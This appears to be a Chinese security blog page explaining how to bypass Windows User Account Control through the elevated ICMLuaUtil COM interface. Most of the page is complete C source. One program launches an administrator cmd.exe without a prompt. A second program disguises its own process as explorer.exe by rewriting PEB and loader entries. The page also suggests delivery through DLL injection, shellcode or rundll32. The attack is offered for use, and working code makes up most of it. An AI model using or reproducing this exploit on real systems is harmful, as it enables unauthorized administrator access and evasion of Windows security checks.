通过com组件BypassUAC

COM组件简介
 COM component（COM组件）是微软公司为了计算机工业的软件生产更加符合人类的行为方式开发的一种新的软件开发技术。在COM构架下，人们可以开发出各种各样的功能专一的组件，然后将它们按照需要组合起来，构成复杂的应用系统。
com组件本质上是二进制文件(dll、exe,在windows系统内),其调用方法与c++的类相似，程序可以通过被称为CLSID(全局标识符)作为索引在注册表内找到具体的二进制文件，这篇文章只会介绍应用方法，具体的逆向分析会在之后的文章内详细解释(等公司买正版ida,现在用的盗版就不拿出来丢人了)。
windows提供了一种com组件提权的方法，其原意大概是为了方便开发，所以当这种提提权方法的调用者是拥有微软签名的合法程序时(其本质是校验PEB)，会忽略uac弹窗，这也为了我们利用该技术埋下了隐患。
1
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void ** ppv)
2
{
3
    BIND_OPTS3 bo;
4
    WCHAR  wszCLSID[50];
5
    WCHAR  wszMonikerName[300];
6
​
7
    StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0])); 
8
    HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName)/sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);
9
    if (FAILED(hr))
10
        return hr;
11
    memset(&bo, 0, sizeof(bo));
12
    bo.cbStruct = sizeof(bo);
13
    bo.hwnd = hwnd;
14
    bo.dwClassContext  = CLSCTX_LOCAL_SERVER;
15
    return CoGetObject(wszMonikerName, &bo, riid, ppv);
16
}
Copied!
在com组件中，有一个名为ICMLuaUtil的接口，这个接口提供了一个名为ShellExec的方法，顾名思义，可以执行任意传入的命令，如果我们能用提权的ICMLuaUtil接口调用ShellExec，那么我们就能获得一个不受限的管理员令牌。
流程
1.
初始化com库
2.
创建提升权限的ICMLuaUtil接口
3.
调用ICMLuaUtil的ShellExec方法
4.
弹出一个高权限的calc(串戏了)。
代码
1
#include "BypassUAC.h"
2
​
3
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void** ppv)
4
{
5
​
6
	BIND_OPTS3 bo;
7
	WCHAR  wszCLSID[50];
8
	WCHAR  wszMonikerName[300];
9
​
10
	StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID) / sizeof(wszCLSID[0]));
11
	HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName) / sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);
12
	if (FAILED(hr))
13
		return hr;
14
	memset(&bo, 0, sizeof(bo));
15
​
16
	bo.cbStruct = sizeof(bo);
17
	bo.hwnd = hwnd;
18
	bo.dwClassContext = CLSCTX_LOCAL_SERVER;
19
	return CoGetObject(wszMonikerName, &bo, riid, ppv);
20
}
21
​
22
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
23
{
24
	HRESULT hr = 0;
25
	CLSID clsidICMLuaUtil = { 0 };
26
	IID iidICMLuaUtil = { 0 };
27
	ICMLuaUtil* CMLuaUtil = NULL;
28
	BOOL bRet = FALSE;
29
​
30
​
31
	CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
32
	IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);
33
​
34
	CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));
35
	hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);
36
	CMLuaUtil->lpVtbl->Release(CMLuaUtil);
37
​
38
	if (GetLastError())
39
	{
40
		return FALSE;
41
	}
42
	else {
43
		return TRUE;	
44
	}
45
}
46
​
47
int main() {
48
	CoInitialize(NULL);
49

50
	CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
51
	CoUninitialize();
52
	return 0;
53
}
Copied!
​
利用方法
shellcode&dll注入
把这个代码写成一个dll，然后通过进程注入的方式获得一个合法的进程环境。
shellcode注入和dll注入差不多，只不过注入的具体dll被打成了shellcode，我记得有这么一个开源项目可以做到，原理类似于在dll二进制代码前写一个加载器
rundll32
rundll32是windows提供的一个合法exe，它能把一个单独的dll拉起来成为一个进程，这也起来的进程也被windows视为合法。
伪装进程
原理我之前的文章写过fakecommandline，这篇文章的基础上再添加对ldr的伪装，就能绕过对进程的校验，具体的代码三号学生大佬写过this。
1
#include "BypassUAC.h"
2
​
3
#include <Shobjidl.h>
4
#include <string>
5
#pragma comment(lib, "ntdll.lib")
6
​
7
#define RTL_MAX_DRIVE_LETTERS 32
8
#define GDI_HANDLE_BUFFER_SIZE32  34
9
#define GDI_HANDLE_BUFFER_SIZE64  60
10
#define GDI_BATCH_BUFFER_SIZE 310
11
​
12
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
13
#ifndef NT_SUCCESS
14
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
15
#endif
16
​
17
#if !defined(_M_X64)
18
#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE32
19
#else
20
#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE64
21
#endif
22
​
23
typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
24
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
25
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
26
​
27
typedef struct _UNICODE_STRING {
28
    USHORT Length;
29
    USHORT MaximumLength;
30
    PWSTR  Buffer;
31
} UNICODE_STRING;
32
typedef UNICODE_STRING* PUNICODE_STRING;
33
​
34
​
35
typedef struct _STRING {
36
    USHORT Length;
37
    USHORT MaximumLength;
38
    PCHAR Buffer;
39
} STRING;
40
typedef STRING* PSTRING;
41
​
42
typedef struct _CLIENT_ID {
43
    HANDLE UniqueProcess;
44
    HANDLE UniqueThread;
45
} CLIENT_ID, * PCLIENT_ID;
46
​
47
typedef struct _CLIENT_ID64 {
48
    ULONG64 UniqueProcess;
49
    ULONG64 UniqueThread;
50
} CLIENT_ID64, * PCLIENT_ID64;
51
​
52
typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
53
    LIST_ENTRY InLoadOrderLinks;
54
    LIST_ENTRY InMemoryOrderLinks;
55
    union
56
    {
57
        LIST_ENTRY InInitializationOrderLinks;
58
        LIST_ENTRY InProgressLinks;
59
    } DUMMYUNION0;
60
    PVOID DllBase;
61
    PVOID EntryPoint;
62
    ULONG SizeOfImage;
63
    UNICODE_STRING FullDllName;
64
    UNICODE_STRING BaseDllName;
65
    union
66
    {
67
        ULONG Flags;
68
        struct
69
        {
70
            ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1
71
            ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1
72
            ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1
73
            ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1
74
            ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1
75
            ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1
76
            ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1
77
            ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1
78
            ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1
79
            ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1
80
            ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2
81
            ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1
82
            ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1
83
            ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1
84
            ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1
85
            ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2
86
            ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1
87
            ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1
88
            ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1
89
            ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1
90
            ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1
91
            ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1
92
            ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1
93
            ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1
94
            ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2
95
            ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1
96
            ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2
97
            ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1
98
        };
99
    } ENTRYFLAGSUNION;
100
    WORD ObsoleteLoadCount;
101
    WORD TlsIndex;
102
    union
103
    {
104
        LIST_ENTRY HashLinks;
105
        struct
106
        {
107
            PVOID SectionPointer;
108
            ULONG CheckSum;
109
        };
110
    } DUMMYUNION1;
111
    union
112
    {
113
        ULONG TimeDateStamp;
114
        PVOID LoadedImports;
115
    } DUMMYUNION2;
116
    //fields below removed for compatibility
117
} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
118
typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
119
​
120
typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
121
​
122
typedef struct _PEB_LDR_DATA {
123
    ULONG Length;
124
    BOOLEAN Initialized;
125
    HANDLE SsHandle;
126
    LIST_ENTRY InLoadOrderModuleList;
127
    LIST_ENTRY InMemoryOrderModuleList;
128
    LIST_ENTRY InInitializationOrderModuleList;
129
    PVOID EntryInProgress;
130
    BOOLEAN ShutdownInProgress;
131
    HANDLE ShutdownThreadId;
132
} PEB_LDR_DATA, * PPEB_LDR_DATA;
133
​
134
​
135
typedef struct _CURDIR {
136
    UNICODE_STRING DosPath;
137
    HANDLE Handle;
138
} CURDIR, * PCURDIR;
139
​
140
typedef struct _RTL_DRIVE_LETTER_CURDIR {
141
    USHORT Flags;
142
    USHORT Length;
143
    ULONG TimeStamp;
144
    STRING DosPath;
145
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
146
​
147
​
148
typedef struct _RTL_USER_PROCESS_PARAMETERS {
149
    ULONG MaximumLength;
150
    ULONG Length;
151
​
152
    ULONG Flags;
153
    ULONG DebugFlags;
154
​
155
    HANDLE ConsoleHandle;
156
    ULONG ConsoleFlags;
157
    HANDLE StandardInput;
158
    HANDLE StandardOutput;
159
    HANDLE StandardError;
160
​
161
    CURDIR CurrentDirectory;
162
    UNICODE_STRING DllPath;
163
    UNICODE_STRING ImagePathName;
164
    UNICODE_STRING CommandLine;
165
    PVOID Environment;
166
​
167
    ULONG StartingX;
168
    ULONG StartingY;
169
    ULONG CountX;
170
    ULONG CountY;
171
    ULONG CountCharsX;
172
    ULONG CountCharsY;
173
    ULONG FillAttribute;
174
​
175
    ULONG WindowFlags;
176
    ULONG ShowWindowFlags;
177
    UNICODE_STRING WindowTitle;
178
    UNICODE_STRING DesktopInfo;
179
    UNICODE_STRING ShellInfo;
180
    UNICODE_STRING RuntimeData;
181
    RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
182
​
183
    ULONG EnvironmentSize;
184
    ULONG EnvironmentVersion;
185
    PVOID PackageDependencyData; //8+
186
    ULONG ProcessGroupId;
187
    // ULONG LoaderThreads;
188
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
189
​
190
typedef struct _PEB {
191
    BOOLEAN InheritedAddressSpace;
192
    BOOLEAN ReadImageFileExecOptions;
193
    BOOLEAN BeingDebugged;
194
    union
195
    {
196
        BOOLEAN BitField;
197
        struct
198
        {
199
            BOOLEAN ImageUsesLargePages : 1;
200
            BOOLEAN IsProtectedProcess : 1;
201
            BOOLEAN IsImageDynamicallyRelocated : 1;
202
            BOOLEAN SkipPatchingUser32Forwarders : 1;
203
            BOOLEAN IsPackagedProcess : 1;
204
            BOOLEAN IsAppContainer : 1;
205
            BOOLEAN IsProtectedProcessLight : 1;
206
            BOOLEAN IsLongPathAwareProcess : 1;
207
        };
208
    };
209
    HANDLE Mutant;
210
​
211
    PVOID ImageBaseAddress;
212
    PPEB_LDR_DATA Ldr;
213
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
214
    PVOID SubSystemData;
215
    PVOID ProcessHeap;
216
    PRTL_CRITICAL_SECTION FastPebLock;
217
    PVOID AtlThunkSListPtr;
218
    PVOID IFEOKey;
219
    union
220
    {
221
        ULONG CrossProcessFlags;
222
        struct
223
        {
224
            ULONG ProcessInJob : 1;
225
            ULONG ProcessInitializing : 1;
226
            ULONG ProcessUsingVEH : 1;
227
            ULONG ProcessUsingVCH : 1;
228
            ULONG ProcessUsingFTH : 1;
229
            ULONG ProcessPreviouslyThrottled : 1;
230
            ULONG ProcessCurrentlyThrottled : 1;
231
            ULONG ReservedBits0 : 25;
232
        };
233
        ULONG EnvironmentUpdateCount;
234
    };
235
    union
236
    {
237
        PVOID KernelCallbackTable;
238
        PVOID UserSharedInfoPtr;
239
    };
240
    ULONG SystemReserved[1];
241
    ULONG AtlThunkSListPtr32;
242
    PVOID ApiSetMap;
243
    ULONG TlsExpansionCounter;
244
    PVOID TlsBitmap;
245
    ULONG TlsBitmapBits[2];
246
    PVOID ReadOnlySharedMemoryBase;
247
    PVOID HotpatchInformation;
248
    PVOID* ReadOnlyStaticServerData;
249
    PVOID AnsiCodePageData;
250
    PVOID OemCodePageData;
251
    PVOID UnicodeCaseTableData;
252
​
253
    ULONG NumberOfProcessors;
254
    ULONG NtGlobalFlag;
255
​
256
    LARGE_INTEGER CriticalSectionTimeout;
257
    SIZE_T HeapSegmentReserve;
258
    SIZE_T HeapSegmentCommit;
259
    SIZE_T HeapDeCommitTotalFreeThreshold;
260
    SIZE_T HeapDeCommitFreeBlockThreshold;
261
​
262
    ULONG NumberOfHeaps;
263
    ULONG MaximumNumberOfHeaps;
264
    PVOID* ProcessHeaps;
265
​
266
    PVOID GdiSharedHandleTable;
267
    PVOID ProcessStarterHelper;
268
    ULONG GdiDCAttributeList;
269
​
270
    PRTL_CRITICAL_SECTION LoaderLock;
271
​
272
    ULONG OSMajorVersion;
273
    ULONG OSMinorVersion;
274
    USHORT OSBuildNumber;
275
    USHORT OSCSDVersion;
276
    ULONG OSPlatformId;
277
    ULONG ImageSubsystem;
278
    ULONG ImageSubsystemMajorVersion;
279
    ULONG ImageSubsystemMinorVersion;
280
    ULONG_PTR ImageProcessAffinityMask;
281
    GDI_HANDLE_BUFFER GdiHandleBuffer;
282
    PVOID PostProcessInitRoutine;
283
​
284
    PVOID TlsExpansionBitmap;
285
    ULONG TlsExpansionBitmapBits[32];
286
​
287
    ULONG SessionId;
288
​
289
    ULARGE_INTEGER AppCompatFlags;
290
    ULARGE_INTEGER AppCompatFlagsUser;
291
    PVOID pShimData;
292
    PVOID AppCompatInfo;
293
​
294
    UNICODE_STRING CSDVersion;
295
​
296
    PVOID ActivationContextData;
297
    PVOID ProcessAssemblyStorageMap;
298
    PVOID SystemDefaultActivationContextData;
299
    PVOID SystemAssemblyStorageMap;
300
​
301
    SIZE_T MinimumStackCommit;
302
​
303
    PVOID* FlsCallback;
304
    LIST_ENTRY FlsListHead;
305
    PVOID FlsBitmap;
306
    ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
307
    ULONG FlsHighIndex;
308
​
309
    PVOID WerRegistrationData;
310
    PVOID WerShipAssertPtr;
311
    PVOID pContextData;
312
    PVOID pImageHeaderHash;
313
    union
314
    {
315
        ULONG TracingFlags;
316
        struct
317
        {
318
            ULONG HeapTracingEnabled : 1;
319
            ULONG CritSecTracingEnabled : 1;
320
            ULONG LibLoaderTracingEnabled : 1;
321
            ULONG SpareTracingBits : 29;
322
        };
323
    };
324
    ULONGLONG CsrServerReadOnlySharedMemoryBase;
325
} PEB, * PPEB;
326
​
327
typedef struct _GDI_TEB_BATCH {
328
    ULONG	Offset;
329
    UCHAR	Alignment[4];
330
    ULONG_PTR HDC;
331
    ULONG	Buffer[GDI_BATCH_BUFFER_SIZE];
332
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
333
​
334
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
335
    ULONG Flags;
336
    PSTR FrameName;
337
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
338
​
339
typedef struct _TEB_ACTIVE_FRAME {
340
    ULONG Flags;
341
    struct _TEB_ACTIVE_FRAME* Previous;
342
    PTEB_ACTIVE_FRAME_CONTEXT Context;
343
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
344
​
345
typedef struct _TEB {
346
    NT_TIB NtTib;
347
​
348
    PVOID EnvironmentPointer;
349
    CLIENT_ID ClientId;
350
    PVOID ActiveRpcHandle;
351
    PVOID ThreadLocalStoragePointer;
352
    PPEB ProcessEnvironmentBlock;
353
​
354
    ULONG LastErrorValue;
355
    ULONG CountOfOwnedCriticalSections;
356
    PVOID CsrClientThread;
357
    PVOID Win32ThreadInfo;
358
    ULONG User32Reserved[26];
359
    ULONG UserReserved[5];
360
    PVOID WOW32Reserved;
361
    LCID CurrentLocale;
362
    ULONG FpSoftwareStatusRegister;
363
    PVOID SystemReserved1[54];
364
    NTSTATUS ExceptionCode;
365
    PVOID ActivationContextStackPointer;
366
#if defined(_M_X64)
367
    UCHAR SpareBytes[24];
368
#else
369
    UCHAR SpareBytes[36];
370
#endif
371
    ULONG TxFsContext;
372
​
373
    GDI_TEB_BATCH GdiTebBatch;
374
    CLIENT_ID RealClientId;
375
    HANDLE GdiCachedProcessHandle;
376
    ULONG GdiClientPID;
377
    ULONG GdiClientTID;
378
    PVOID GdiThreadLocalInfo;
379
    ULONG_PTR Win32ClientInfo[62];
380
    PVOID glDispatchTable[233];
381
    ULONG_PTR glReserved1[29];
382
    PVOID glReserved2;
383
    PVOID glSectionInfo;
384
    PVOID glSection;
385
    PVOID glTable;
386
    PVOID glCurrentRC;
387
    PVOID glContext;
388
​
389
    NTSTATUS LastStatusValue;
390
    UNICODE_STRING StaticUnicodeString;
391
    WCHAR StaticUnicodeBuffer[261];
392
​
393
    PVOID DeallocationStack;
394
    PVOID TlsSlots[64];
395
    LIST_ENTRY TlsLinks;
396
​
397
    PVOID Vdm;
398
    PVOID ReservedForNtRpc;
399
    PVOID DbgSsReserved[2];
400
​
401
    ULONG HardErrorMode;
402
#if defined(_M_X64)
403
    PVOID Instrumentation[11];
404
#else
405
    PVOID Instrumentation[9];
406
#endif
407
    GUID ActivityId;
408
​
409
    PVOID SubProcessTag;
410
    PVOID EtwLocalData;
411
    PVOID EtwTraceData;
412
    PVOID WinSockData;
413
    ULONG GdiBatchCount;
414
​
415
    union
416
    {
417
        PROCESSOR_NUMBER CurrentIdealProcessor;
418
        ULONG IdealProcessorValue;
419
        struct
420
        {
421
            UCHAR ReservedPad0;
422
            UCHAR ReservedPad1;
423
            UCHAR ReservedPad2;
424
            UCHAR IdealProcessor;
425
        };
426
    };
427
​
428
    ULONG GuaranteedStackBytes;
429
    PVOID ReservedForPerf;
430
    PVOID ReservedForOle;
431
    ULONG WaitingOnLoaderLock;
432
    PVOID SavedPriorityState;
433
    ULONG_PTR SoftPatchPtr1;
434
    PVOID ThreadPoolData;
435
    PVOID* TlsExpansionSlots;
436
#if defined(_M_X64)
437
    PVOID DeallocationBStore;
438
    PVOID BStoreLimit;
439
#endif
440
    ULONG MuiGeneration;
441
    ULONG IsImpersonating;
442
    PVOID NlsCache;
443
    PVOID pShimData;
444
    ULONG HeapVirtualAffinity;
445
    HANDLE CurrentTransactionHandle;
446
    PTEB_ACTIVE_FRAME ActiveFrame;
447
    PVOID FlsData;
448
​
449
    PVOID PreferredLanguages;
450
    PVOID UserPrefLanguages;
451
    PVOID MergedPrefLanguages;
452
    ULONG MuiImpersonation;
453
​
454
    union
455
    {
456
        USHORT CrossTebFlags;
457
        USHORT SpareCrossTebBits : 16;
458
    };
459
    union
460
    {
461
        USHORT SameTebFlags;
462
        struct
463
        {
464
            USHORT SafeThunkCall : 1;
465
            USHORT InDebugPrint : 1;
466
            USHORT HasFiberData : 1;
467
            USHORT SkipThreadAttach : 1;
468
            USHORT WerInShipAssertCode : 1;
469
            USHORT RanProcessInit : 1;
470
            USHORT ClonedThread : 1;
471
            USHORT SuppressDebugMsg : 1;
472
            USHORT DisableUserStackWalk : 1;
473
            USHORT RtlExceptionAttached : 1;
474
            USHORT InitialThread : 1;
475
            USHORT SpareSameTebBits : 1;
476
        };
477
    };
478
​
479
    PVOID TxnScopeEnterCallback;
480
    PVOID TxnScopeExitCallback;
481
    PVOID TxnScopeContext;
482
    ULONG LockCount;
483
    ULONG SpareUlong0;
484
    PVOID ResourceRetValue;
485
} TEB, * PTEB;
486
​
487
typedef VOID(NTAPI* PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(
488
    _In_    PCLDR_DATA_TABLE_ENTRY DataTableEntry,
489
    _In_    PVOID Context,
490
    _Inout_ BOOLEAN* StopEnumeration
491
    );
492
​
493
typedef PVOID NTAPI RTLINITUNICODESTRING(
494
    _Inout_	PUNICODE_STRING DestinationString,
495
    _In_opt_ PCWSTR SourceString
496
);
497
typedef RTLINITUNICODESTRING FAR* LPRTLINITUNICODESTRING;
498
LPRTLINITUNICODESTRING			RtlInitUnicodeString;
499
​
500
typedef NTSTATUS NTAPI RTLENTERCRITICALSECTION(
501
    _In_ PRTL_CRITICAL_SECTION CriticalSection
502
);
503
typedef RTLENTERCRITICALSECTION FAR* LPRTLENTERCRITICALSECTION;
504
LPRTLENTERCRITICALSECTION			RtlEnterCriticalSection;
505
​
506
typedef NTSTATUS NTAPI RTLLEAVECRITICALSECTION(
507
    _In_ PRTL_CRITICAL_SECTION CriticalSection
508
);
509
typedef RTLLEAVECRITICALSECTION FAR* LPRTLLEAVECRITICALSECTION;
510
LPRTLLEAVECRITICALSECTION			RtlLeaveCriticalSection;
511
​
512
typedef NTSTATUS NTAPI LDRENUMERATELOADEDMODULES(
513
    _In_opt_ ULONG Flags,
514
    _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,
515
    _In_opt_ PVOID Context);
516
typedef LDRENUMERATELOADEDMODULES FAR* LPLDRENUMERATELOADEDMODULES;
517
LPLDRENUMERATELOADEDMODULES			LdrEnumerateLoadedModules;
518
​
519
typedef NTSTATUS NTAPI NTALLOCATEVIRTUALMEMORY(
520
    _In_        HANDLE ProcessHandle,
521
    _Inout_     PVOID* BaseAddress,
522
    _In_        ULONG_PTR ZeroBits,
523
    _Inout_     PSIZE_T RegionSize,
524
    _In_        ULONG AllocationType,
525
    _In_        ULONG Protect
526
);
527
typedef NTALLOCATEVIRTUALMEMORY FAR* LPNTALLOCATEVIRTUALMEMORY;
528
LPNTALLOCATEVIRTUALMEMORY	NtAllocateVirtualMemory;
529
​
530
LPWSTR g_lpszExplorer2 = (LPWSTR)L"C:\\windows\\explorer.exe";
531
​
532
VOID NTAPI supxLdrEnumModulesCallback(
533
    _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
534
    _In_ PVOID Context,
535
    _Inout_ BOOLEAN* StopEnumeration
536
)
537
{
538
    PPEB Peb = (PPEB)Context;
539
    
540
    if (DataTableEntry->DllBase == Peb->ImageBaseAddress) {
541
        RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer2);
542
        RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe");
543
        *StopEnumeration = TRUE;
544
    }
545
    else {
546
        *StopEnumeration = FALSE;
547
    }
548
}
549
​
550
​
551
__inline struct _PEB* NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }
552
​
553
​
554
VOID supMasqueradeProcess(
555
    VOID
556
)
557
{
558
​
559
    NTSTATUS Status;
560
    PPEB    Peb = NtCurrentPeb();
561
    SIZE_T  RegionSize;
562
​
563
    PVOID g_lpszExplorer = NULL;
564
    RegionSize = 0x1000;
565
    
566
    Status = NtAllocateVirtualMemory(
567
        NtCurrentProcess(),
568
        &g_lpszExplorer,
569
        0,
570
        &RegionSize,
571
        MEM_COMMIT | MEM_RESERVE,
572
        PAGE_READWRITE);
573
​
574
    if (NT_SUCCESS(Status)) {
575
        RtlEnterCriticalSection(Peb->FastPebLock);
576
​
577
        RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer2);
578
        RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, g_lpszExplorer2);
579
​
580
        RtlLeaveCriticalSection(Peb->FastPebLock);
581
​
582
        LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb);
583
    }
584
}
585
​
586
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void** ppv)
587
{
588
​
589
	BIND_OPTS3 bo;
590
	WCHAR  wszCLSID[50];
591
	WCHAR  wszMonikerName[300];
592
	CoInitialize(NULL);
593
	StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID) / sizeof(wszCLSID[0]));
594
	HRESULT hr = StringCchPrintfW(wszMonikerName, sizeof(wszMonikerName) / sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);
595
	if (FAILED(hr))
596
		return hr;
597
​
598
	memset(&bo, 0, sizeof(bo));
599
​
600
	bo.cbStruct = sizeof(bo);
601
	bo.hwnd = hwnd;
602
	bo.dwClassContext = CLSCTX_LOCAL_SERVER;
603
​
604
	return CoGetObject(wszMonikerName, &bo, riid, ppv);
605
}
606
​
607
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
608
{
609
	HRESULT hr = 0;
610
	CLSID clsidICMLuaUtil = { 0 };
611
	IID iidICMLuaUtil = { 0 };
612
	ICMLuaUtil* CMLuaUtil = NULL;
613
	BOOL bRet = FALSE;
614
​
615
​
616
	CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
617
	IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);
618
​
619
	CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));
620
	hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);
621
​
622
	CMLuaUtil->lpVtbl->Release(CMLuaUtil);
623
​
624
	if (GetLastError())
625
	{
626
		return FALSE;
627
	}
628
	else {
629
		return TRUE;	
630
	}
631
}
632
/*
633
int main() {
634
	CoInitialize(NULL);
635
​
636
	CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
637
	CoUninitialize();
638
	return 0;
639
}*/
640
VOID  main()
641
{
642
    NtAllocateVirtualMemory = (LPNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
643
    RtlEnterCriticalSection = (LPRTLENTERCRITICALSECTION)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEnterCriticalSection");
644
    RtlInitUnicodeString = (LPRTLINITUNICODESTRING)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
645
    RtlLeaveCriticalSection = (LPRTLLEAVECRITICALSECTION)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlLeaveCriticalSection");
646
    LdrEnumerateLoadedModules = (LPLDRENUMERATELOADEDMODULES)GetProcAddress(GetModuleHandleA("ntdll.dll"), "LdrEnumerateLoadedModules");
647
    supMasqueradeProcess();
648
	CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
649
	//CoUninitialize();
650
​
651
}
652
​
Copied!
LINKS
COM 提升名字对象 - Win32 apps
docsmsft
基于COM组件接口ICMLuaUtil的BypassUAC - 自己的小白 - 博客园
​
​
​
权限提升 - 以前
基于dll劫持BypassUac
下一个 - 权限提升
通过复制Token提权到SYSTEM
最近更新 1yr ago
复制链接
内容